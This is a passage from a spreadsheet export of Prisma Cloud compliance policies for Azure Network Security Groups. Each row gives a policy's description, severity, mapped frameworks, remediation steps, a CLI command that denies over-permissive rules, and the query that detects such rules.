          <t>azure</t>
        </is>
      </c>
      <c r="J2331" t="inlineStr">
        <is>
          <t>azure-network-nsg</t>
        </is>
      </c>
      <c r="K2331" t="inlineStr">
        <is>
          <t>Azure Network Security Group having Inbound rule overly permissive to all traffic on TCP protocol</t>
        </is>
      </c>
      <c r="L2331" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2331" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2331" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2331" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2331" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2331" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2331" t="inlineStr">
        <is>
          <t>ISM-1006</t>
        </is>
      </c>
      <c r="S2331" t="inlineStr"/>
      <c r="T2331" t="b">
        <v>1</v>
      </c>
      <c r="U2331" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2331" t="inlineStr">
        <is>
          <t>azure-network-nsg-list</t>
        </is>
      </c>
      <c r="W2331" t="inlineStr">
        <is>
          <t>This policy identifies Azure Network Security Groups (NSGs) which are overly permissive to all traffic on TCP protocol. A network security group contains a list of security rules that allow or deny inbound or outbound network traffic based on source or destination IP address, port, and protocol. As a best practice, it is recommended to configure NSGs to restrict traffic from known sources, allowing only authorized protocols and ports.</t>
        </is>
      </c>
      <c r="X2331"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and Port ranges OR set the 'Action' to 'Deny' OR 'Delete' the rule based on your requirement.
7. 'Save' your changes.</t>
        </is>
      </c>
      <c r="Y2331" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'Microsoft.Network/networkSecurityGroups/securityRules/*' permission. Successful execution will update the network security group to revoke the inbound rule records allowing all traffic from Internet on TCP protocol.",
'impact': 'reject all traffic from Internet on TCP protocol',
'cliScriptTemplate': 'az network nsg rule update --name $ruleName --resource-group $resourceGroup --nsg-name $resourceName --access Deny'</t>
        </is>
      </c>
      <c r="Z2331" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name= 'azure-network-nsg-list' AND json.rule = securityRules[?any((sourceAddressPrefix equals Internet or sourceAddressPrefix equals * or sourceAddressPrefix equals 0.0.0.0/0 or sourceAddressPrefix equals ::/0) and protocol equals Tcp and access equals Allow and direction equals Inbound and destinationPortRange contains *)] exists</t>
        </is>
      </c>
      <c r="AA2331" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2331" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2331" t="inlineStr">
        <is>
          <t>PC-AZR-NWK-186</t>
        </is>
      </c>
      <c r="AD2331" t="b">
        <v>1</v>
      </c>
      <c r="AE2331" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2331" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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1" t="inlineStr">
        <is>
          <t>543c6a0a-a50c-11e8-98d0-529269fb1459</t>
        </is>
      </c>
      <c r="AI2331" t="inlineStr">
        <is>
          <t>543c664a-a50c-11e8-98d0-529269fb1459</t>
        </is>
      </c>
      <c r="AJ2331" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2331" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2332">
      <c r="A2332" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, CIS Controls v7.1, Sarbanes Oxley Act (SOX), CRI Profile v1.2.1, APRA (CPS 234) Information Security, MLPS 2.0 (Level 2), CIS v1.3.0 (Azure), ISO 27002:2022, ISO/IEC 27017:2015, MLPS 2.0 (Level 2), ISO/IEC 27001:2022, CIS v1.4.0 (Azure), ISO/IEC 27002:2013, ITSG-33, Secure Controls Framework (SCF) - 2024.2, ACSC Information Security Manual (ISM), CSA CCM v4.0.12, MLPS 2.0 (Level 2), CSA CCM v.4.0.1, APRA (CPS 234) Information Security, NIST 800-53 Rev 5, ISO/IEC 27017:2015, PCI DSS v3.2.1, CIS v2.1.0 (Azure) Level 2, CSA CCM v.4.0.1, ISO/IEC 27017:2015, CSA CCM v4.0.12, CIS v1.5.0 (Azure) - Level 2, CyberSecurity Law of the People's Republic of China, ISO/IEC 27001:2022, NIST 800-53 Rev4, CSA CCM v.4.0.6, Secure Controls Framework (SCF) - 2022.2.1, APRA (CPS 234) Information Security, CyberSecurity Law of the People's Republic of China, TX-RAMP Level 2, CIS Controls v8, PCI DSS v4.0, NIST CSF, Azure Security Benchmark (v3), HITRUST v.9.4.2 [Deprecated], HITRUST v.9.4.2 [Deprecated], HITRUST v.9.4.2 [Deprecated], Insurance Regulatory And Development Authority Of India, Microsoft Cloud Security Benchmark v1, TX-RAMP Level 1, NIST SP 800-171 Revision 3, Fedramp (Moderate), Secure Controls Framework (SCF) - 2022.2.1, CIS Controls v8.1, ITSG-33, TX-RAMP Level 2, TX-RAMP Level 1, Insurance Regulatory And Development Authority Of India, HITRUST v.9.4.2 [Deprecated], NIST SP 800-171 Revision 2, CIS v1.3.1 (Azure), NIST CSF, CyberSecurity Law of the People's Republic of China, CSA CCM v.4.0.1, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), DORA, CSA CCM v.4.0.1, Insurance Regulatory And Development Authority Of India, APRA (CPS 234) Information Security, CIS v1.2.0 (Azure), ISO/IEC 27002:2013, Azure Security Benchmark (v2), SOC 2, NIST CSF v2.0, APRA (CPS 234) Information Security, HITRUST CSF v.11.2.0, Fedramp (Low), Microsoft Cloud Security Benchmark v1, NIST CSF, RBI Baseline Cyber Security and Resilience Requirements, CIS v1.1 (Azure), NIST SP 800-172, ITSG-33, ISO/IEC 27002:2013, CIS v2.0.0 (Azure) Level 2, Brazilian Data Protection Law (LGPD), Microsoft Cloud Security Benchmark v1, DORA, ACSC Information Security Manual (ISM), PCI DSS v3.2.1, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-171 Revision 3, PCI DSS v3.2.1, Brazilian Data Protection Law (LGPD)</t>
        </is>
      </c>
      <c r="B2332" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2332" s="2" t="inlineStr"/>
      <c r="D2332" t="inlineStr"/>
      <c r="E2332" t="inlineStr"/>
      <c r="F2332" t="inlineStr"/>
      <c r="G2332" t="b">
        <v>1</v>
      </c>
      <c r="H23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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2332" t="inlineStr">
        <is>
          <t>azure-network-nsg</t>
        </is>
      </c>
      <c r="K2332" t="inlineStr">
        <is>
          <t>Azure Network Watcher Network Security Group (NSG) flow logs retention is less than 90 days</t>
        </is>
      </c>
      <c r="L2332" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2332" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2332" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2332" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2332" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2332" t="inlineStr">
        <is>
          <t>Chapter-6 (Sec 1)</t>
        </is>
      </c>
      <c r="R2332" t="inlineStr">
        <is>
          <t>Article 40</t>
        </is>
      </c>
      <c r="S2332" t="inlineStr"/>
      <c r="T2332" t="b">
        <v>0</v>
      </c>
      <c r="U2332" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2332" t="inlineStr">
        <is>
          <t>azure-network-nsg-list</t>
        </is>
      </c>
      <c r="W2332" t="inlineStr">
        <is>
          <t>This policy identifies Azure Network Security Groups (NSG) for which flow logs retention period is 90 days or less. To perform this check, enable this action on the Azure Service Principal: 'Microsoft.Network/networkWatchers/queryFlowLogStatus/action'.
NSG flow logs, a feature of the Network Watcher app, enable you to view information about ingress and egress IP traffic through an NSG. The flow logs include information such as:
- Outbound and inbound flows on a per-rule basis.
- Network interface to which the flow applies.
- 5-tuple information about the flow (source/destination IP, source/destination port, protocol).
- Whether the traffic was allowed or denied.
As a best practice, enable NSG flow logs and set the log retention period to at least 90 days.</t>
        </is>
      </c>
      <c r="X2332" t="inlineStr">
        <is>
          <t>To enable Flow Logs:
1. Log in to the Azure portal.
2. Select 'Network Watcher'.
3. Select 'NSG flow logs'.
4. Select the NSG for which you need to modify the flow log settings.
5. Set the Flow logs 'Status' to 'On'.
6. Select the destination 'Storage account'.
7. Set the 'Retention (days)' to 90 days or greater.
8. 'Save' your changes. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-logging-policies/bc-azr-logging-1
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-logging-policies/bc-azr-logging-1</t>
        </is>
      </c>
      <c r="Y2332" t="inlineStr"/>
      <c r="Z2332" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-network-nsg-list' AND json.rule =  ' $.flowLogsSettings does not exist or  $.flowLogsSettings.enabled is false or  ($.flowLogsSettings.retentionPolicy.days does not equal 0 and $.flowLogsSettings.retentionPolicy.days less than 90) '
{"category":"Logging","resourceTypes":["azurerm_network_watcher_flow_log"]}</t>
        </is>
      </c>
      <c r="AA2332" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2332" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2332" t="inlineStr">
        <is>
          <t>PC-AZR-NWK-304-CKV_AZURE_12</t>
        </is>
      </c>
      <c r="AD2332" t="b">
        <v>1</v>
      </c>
      <c r="AE2332" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2332" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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2" t="inlineStr">
        <is>
          <t>09fcb4f7-59f3-4101-a717-d4f5a5235067</t>
        </is>
      </c>
      <c r="AI2332" t="inlineStr">
        <is>
          <t>7c0570f7-d467-4652-b699-9189d5fe86a3</t>
        </is>
      </c>
      <c r="AJ2332" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2332" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2333">
      <c r="A2333"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ISO/IEC 27002:2013, ISO/IEC 27002:2013, NIST 800-53 Rev4, NIST 800-53 Rev 5, TX-RAMP Level 1,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NIST CSF, CSA CCM v.4.0.1, RBI Baseline Cyber Security and Resilience Requirements, GDPR, NIST CSF, SOC 2, NIST CSF, FFIEC, TX-RAMP Level 2,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33" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2333" s="2" t="inlineStr"/>
      <c r="D2333" t="inlineStr"/>
      <c r="E2333" t="inlineStr"/>
      <c r="F2333" t="inlineStr"/>
      <c r="G2333" t="b">
        <v>0</v>
      </c>
      <c r="H23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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2333" t="inlineStr">
        <is>
          <t>azure-network-nsg</t>
        </is>
      </c>
      <c r="K2333" t="inlineStr">
        <is>
          <t>Azure Network Security Group allows all traffic on SMTP (TCP Port 25)</t>
        </is>
      </c>
      <c r="L2333" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2333" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2333" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2333" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2333" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2333" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2333" t="inlineStr">
        <is>
          <t>ISM-1006</t>
        </is>
      </c>
      <c r="S2333" t="inlineStr"/>
      <c r="T2333" t="b">
        <v>0</v>
      </c>
      <c r="U2333" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2333" t="inlineStr">
        <is>
          <t>azure-network-nsg-list</t>
        </is>
      </c>
      <c r="W2333" t="inlineStr">
        <is>
          <t>This policy identifies Azure Network Security Groups (NSG) that allow all traffic on SMTP (TCP Port 25). Review your list of NSG rules to ensure that your resources are not exposed. As a best practice, restrict SMTP solely to known static IP addresses. Limit the access list to include known hosts, services, or specific employees only.</t>
        </is>
      </c>
      <c r="X2333"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3" t="inlineStr"/>
      <c r="Z2333"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_Port.inRange(25,25) or destinationPortRanges[*] contains _Port.inRange(25,25) ))] exists</t>
        </is>
      </c>
      <c r="AA2333" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2333" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2333" t="inlineStr">
        <is>
          <t>PC-AZR-NWK-284</t>
        </is>
      </c>
      <c r="AD2333" t="b">
        <v>1</v>
      </c>
      <c r="AE2333" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2333" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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3" t="inlineStr">
        <is>
          <t>ac851899-1007-48c8-842f-dddb9a38c4ba</t>
        </is>
      </c>
      <c r="AI2333" t="inlineStr">
        <is>
          <t>63199794-1208-4e6b-aa02-c257f84a6e6b</t>
        </is>
      </c>
      <c r="AJ2333" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2333" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2334">
      <c r="A2334"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ACSC Information Security Manual (ISM), ACSC Information Security Manual (ISM), New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27002:2013, ISO/IEC 27002:2013, kfirdaus AWS Account-CS,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ISO/IEC 27002:2013, ISO/IEC 27002:2013, NIST 800-53 Rev4, NIST 800-53 Rev 5, Copy of ACSC Information Security Manual (ISM)-clone, CIS Controls v7.1, NIST CSF, CSA CCM v.4.0.1, CDC NIST 800-53 Rev4, NIST 800-53 Rev 5, PCI DSS v3.2.1, ISO/IEC 27002:2013, NIST 800-53 Rev4, CSA CCM v.4.0.6, CIS Controls v7.1, ISO/IEC 27017:2015, NIST SP 800-172, CSA CCM v.4.0.1, ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, Fedramp (Moderate), Insurance Regulatory And Development Authority Of India, Sarbanes Oxley Act (SOX), ISO 27002:2022, CSA CCM v.4.0.1, ISO/IEC 27002:2013, NIST CSF, CDC NIST 800-53 Rev4, CDC NIST 800-53 Rev4, CSA CCM v4.0.12, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, MLPS 2.0 (Level 2), kfirdaus AWS Account-CS, Secure Controls Framework (SCF) - 2024.2, HITRUST v.9.4.2 [Deprecated], CSA CCM v.4.0.1, ISO/IEC 27018:2019, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, PCI DSS v4.0, ISO/IEC 27017:2015, kashan ACSC Information Security Manual (ISM),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Copy of New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST CSF, Microsoft Cloud Security Benchmark v1, CSA CCM v.4.0.1, RBI Baseline Cyber Security and Resilience Requirements, NIST CSF,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ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CyberSecurity Law of the People's Republic of China, NIST CSF, CSA CCM v.4.0.1, NIST SP 800-171 Revision 2, ISO/IEC 27018:2019, PCI DSS v4.0, CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B2334" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2334" s="2" t="inlineStr"/>
      <c r="D2334" t="inlineStr"/>
      <c r="E2334" t="inlineStr"/>
      <c r="F2334" t="inlineStr"/>
      <c r="G2334" t="b">
        <v>0</v>
      </c>
      <c r="H23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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2334" t="inlineStr">
        <is>
          <t>azure-network-nsg</t>
        </is>
      </c>
      <c r="K2334" t="inlineStr">
        <is>
          <t>Azure Network Security Group allows all traffic on ICMP (Ping)</t>
        </is>
      </c>
      <c r="L2334" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2334" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2334" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2334" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2334" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2334" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2334" t="inlineStr">
        <is>
          <t>ISM-1006</t>
        </is>
      </c>
      <c r="S2334" t="inlineStr"/>
      <c r="T2334" t="b">
        <v>0</v>
      </c>
      <c r="U2334" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2334" t="inlineStr">
        <is>
          <t>azure-network-nsg-list</t>
        </is>
      </c>
      <c r="W2334" t="inlineStr">
        <is>
          <t>This policy identifies Azure Network Security Groups (NSG) that allow all traffic on ICMP (Ping) protocol. ICMP is used by devices to communicate error messages and status. While ICMP is useful for  diagnostics and troubleshooting, it can also be used to exploit or disrupt systems. Review your list of NSG rules to ensure that your resources are not exposed. As a best practice, restrict ICMP (Ping) solely to known static IP addresses. Limit the access list to include known hosts, services, or specific employees only.</t>
        </is>
      </c>
      <c r="X2334"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4" t="inlineStr"/>
      <c r="Z2334" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name= 'azure-network-nsg-list' AND json.rule = securityRules[?any((sourceAddressPrefix equals Internet or sourceAddressPrefix equals * or sourceAddressPrefix equals 0.0.0.0/0 or sourceAddressPrefix equals ::/0) and (protocol equals Icmp or protocol equals *) and access equals Allow and direction equals Inbound and destinationPortRange contains *)] exists</t>
        </is>
      </c>
      <c r="AA2334" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2334" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2334" t="inlineStr">
        <is>
          <t>PC-AZR-NWK-281</t>
        </is>
      </c>
      <c r="AD2334" t="b">
        <v>1</v>
      </c>
      <c r="AE2334" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2334" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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4" t="inlineStr">
        <is>
          <t>0a3f1d49-4c05-47c4-98e2-3a42b822d05b</t>
        </is>
      </c>
      <c r="AI2334" t="inlineStr">
        <is>
          <t>5c1e59f6-2e1a-4d2e-8864-00a8365ac10a</t>
        </is>
      </c>
      <c r="AJ2334" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2334" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2335">
      <c r="A2335"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DORA, TX-RAMP Level 2, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CyberSecurity Law of the People's Republic of China, NIST CSF, CSA CCM v.4.0.1, NIST SP 800-171 Revision 2, ISO/IEC 27018:2019, PCI DSS v4.0, CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B2335" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2335" s="2" t="inlineStr"/>
      <c r="D2335" t="inlineStr"/>
      <c r="E2335" t="inlineStr"/>
      <c r="F2335" t="inlineStr"/>
      <c r="G2335" t="b">
        <v>0</v>
      </c>
      <c r="H23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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2335" t="inlineStr">
        <is>
          <t>azure-network-nsg</t>
        </is>
      </c>
      <c r="K2335" t="inlineStr">
        <is>
          <t>Azure Network Security Group allows all traffic on PostgreSQL (TCP Port 5432)</t>
        </is>
      </c>
      <c r="L2335" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2335" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2335" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2335" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2335" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2335" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2335" t="inlineStr">
        <is>
          <t>ISM-1006</t>
        </is>
      </c>
      <c r="S2335" t="inlineStr"/>
      <c r="T2335" t="b">
        <v>0</v>
      </c>
      <c r="U2335" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2335" t="inlineStr">
        <is>
          <t>azure-network-nsg-list</t>
        </is>
      </c>
      <c r="W2335" t="inlineStr">
        <is>
          <t>This policy identifies Azure Network Security Groups (NSG) that allow all traffic on PostgreSQL (TCP Port 5432). Review your list of NSG rules to ensure that your resources are not exposed. As a best practice, restrict PostgreSQL solely to known static IP addresses. Limit the access list to include known hosts, services, or specific employees only.</t>
        </is>
      </c>
      <c r="X2335"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5" t="inlineStr"/>
      <c r="Z2335"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_Port.inRange(5432,5432) or destinationPortRanges[*] contains _Port.inRange(5432,5432) ))] exists</t>
        </is>
      </c>
      <c r="AA2335" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2335" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2335" t="inlineStr">
        <is>
          <t>PC-AZR-NWK-275</t>
        </is>
      </c>
      <c r="AD2335" t="b">
        <v>1</v>
      </c>
      <c r="AE2335" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2335" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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5" t="inlineStr">
        <is>
          <t>a0791206-a669-4948-a845-cc735212013c</t>
        </is>
      </c>
      <c r="AI2335" t="inlineStr">
        <is>
          <t>b498a297-ae00-43ee-b767-d458785c7e00</t>
        </is>
      </c>
      <c r="AJ2335" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2335" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2336">
      <c r="A2336" t="inlineStr">
        <is>
          <t>CSA CCM v3.0.1, Azure Security Benchmark (v3), CIS v1.4.0 (Azure), CIS v1.3.1 (Azure), APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST 800-53 Rev4, Azure Security Benchmark (v2), HIPAA, ACSC Information Security Manual (ISM), ACSC Information Security Manual (ISM), MITRE ATT&amp;CK v8.2 [Deprecated], NIST SP 800-171 Revision 3, GDPR, MITRE ATT&amp;CK v6.3 [Deprecated], APRA (CPS 234) Information Security, PCI DSS v4.0, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, CIS v2.1.0 (Azure) Level 1, NIST SP 800-171 Revision 2, NIST CSF v2.0, NIST 800-53 Rev4, Azure Security Benchmark (v3), TX-RAMP Level 1, SOC 2, CIS Controls v7.1, NIST 800-53 Rev 5, PCI DSS v3.2.1, Telecommunications Security Act - TSA, CSA CCM v.4.0.6, CIS Controls v7.1, SOC 2, NIST SP 800-172, TX-RAMP Level 1, CIS v1.5.0 (Azure) - Level 1, Insurance Regulatory And Development Authority Of India, Sarbanes Oxley Act (SOX), ISO 27002:2022, MPAA Content Protection Best Practices, NIST CSF, CSA CCM v4.0.12, Secure Controls Framework (SCF) - 2024.2, HITRUST CSF v.11.2.0, MLPS 2.0 (Level 2), Secure Controls Framework (SCF) - 2024.2, Azure Security Benchmark (v3), CIS v1.1 (Azure), Microsoft Cloud Security Benchmark v1, Telecommunications Security Act - TSA, ISO/IEC 27001:2022, MITRE ATT&amp;CK v6.3 [Deprecated], PCI DSS v4.0, Azure Security Benchmark (v3), CIS v1.2.0 (Azure), SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), MPAA Content Protection Best Practices, NIST CSF, PCI DSS v4.0, Secure Controls Framework (SCF) - 2022.2.1, Fedramp (Moderate), APRA (CPS 234) Information Security, CIS Controls v8, CSA CCM v3.0.1, NIST SP 800-171 Revision 3, ITSG-33, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CRI Profile v2.0, MITRE ATT&amp;CK v6.3 [Deprecated], RBI Baseline Cyber Security and Resilience Requirements, Azure Security Benchmark (v3), GDPR, SOC 2, FFIEC, TX-RAMP Level 2, Secure Controls Framework (SCF) - 2022.2.1, ACSC Information Security Manual (ISM), CSA CCM v3.0.1, Telecommunications Security Act - TSA, CCPA 2018, PIPEDA, CyberSecurity Law of the People's Republic of China, NIST CSF, Brazilian Data Protection Law (LGPD), CIS v2.0.0 (Azure) Level 1, TX-RAMP Level 2, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CIS v1.3.0 (Azure), CyberSecurity Law of the People's Republic of China, Azure Security Benchmark (v3), CSA CCM v3.0.1, NIST SP 800-171 Revision 2, PCI DSS v4.0, HITRUST CSF v9.3 [Deprecated]</t>
        </is>
      </c>
      <c r="B2336" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2336" s="2" t="inlineStr"/>
      <c r="D2336" t="inlineStr"/>
      <c r="E2336" t="inlineStr"/>
      <c r="F2336" t="inlineStr"/>
      <c r="G2336" t="b">
        <v>1</v>
      </c>
      <c r="H23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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2336" t="inlineStr">
        <is>
          <t>azure-network-nsg</t>
        </is>
      </c>
      <c r="K2336" t="inlineStr">
        <is>
          <t>Azure Network Security Group allows all traffic on SSH port 22</t>
        </is>
      </c>
      <c r="L2336" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2336" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2336" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2336" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2336" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2336" t="inlineStr">
        <is>
          <t>Control Category: 09.0</t>
        </is>
      </c>
      <c r="R2336" t="inlineStr">
        <is>
          <t>Control Reference:09.ab</t>
        </is>
      </c>
      <c r="S2336" t="inlineStr">
        <is>
          <t>Policy Status Review,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2336" t="b">
        <v>1</v>
      </c>
      <c r="U2336" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2336" t="inlineStr">
        <is>
          <t>azure-network-nsg-list</t>
        </is>
      </c>
      <c r="W2336" t="inlineStr">
        <is>
          <t>This policy identifies Network security groups (NSG) that allow all traffic on SSH port 22. Review your list of NSG rules to ensure that your resources are not exposed. As a best practice, restrict SSH solely to known static IP addresses. Limit the access list to include known hosts, services, or specific employees only.</t>
        </is>
      </c>
      <c r="X2336"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 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-3
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-3</t>
        </is>
      </c>
      <c r="Y2336" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'Microsoft.Network/networkSecurityGroups/securityRules/*' permission. Successful execution will update the network security group to revoke the inbound rule records allowing SSH traffic from Internet on port 22.",
'impact': 'reject SSH traffic from Internet on port 22',
'cliScriptTemplate': 'az network nsg rule update --name $ruleName --resource-group $resourceGroup --nsg-name $resourceName --access Deny'</t>
        </is>
      </c>
      <c r="Z2336"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(destinationPortRange contains _Port.inRange(22,22) or destinationPortRanges[*] contains _Port.inRange(22,22) ))] exists
{"category":"Networking","resourceTypes":["azurerm_network_security_group","azurerm_network_security_rule"]}</t>
        </is>
      </c>
      <c r="AA2336" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2336" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2336" t="inlineStr">
        <is>
          <t>PC-AZR-NWK-53-CKV_AZURE_10</t>
        </is>
      </c>
      <c r="AD2336" t="b">
        <v>1</v>
      </c>
      <c r="AE2336" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2336" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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6" t="inlineStr">
        <is>
          <t>3beed53c-3f2d-47b6-bb6f-95da39ff0f26</t>
        </is>
      </c>
      <c r="AI2336" t="inlineStr">
        <is>
